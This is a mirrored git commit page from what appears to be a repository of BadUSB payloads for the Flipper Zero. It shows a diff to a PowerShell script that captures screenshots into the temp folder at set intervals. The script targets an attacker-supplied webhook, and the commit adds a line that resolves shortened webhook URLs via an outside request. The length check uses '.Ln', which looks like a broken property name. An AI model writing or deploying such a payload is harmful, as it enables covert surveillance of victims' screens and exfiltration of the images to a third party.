mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-25 04:15:26 -08:00
Update main.ps1
This commit is contained in:
@@ -2,6 +2,9 @@ $hookurl = "$dc"
|
||||
$seconds = 30 # Screenshot interval
|
||||
$a = 1 # Sceenshot amount
|
||||
|
||||
# shortened URL Detection
|
||||
if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url}
|
||||
|
||||
While ($a -gt 0){
|
||||
$Filett = "$env:temp\SC.png"
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
|
||||
Reference in New Issue
Block a user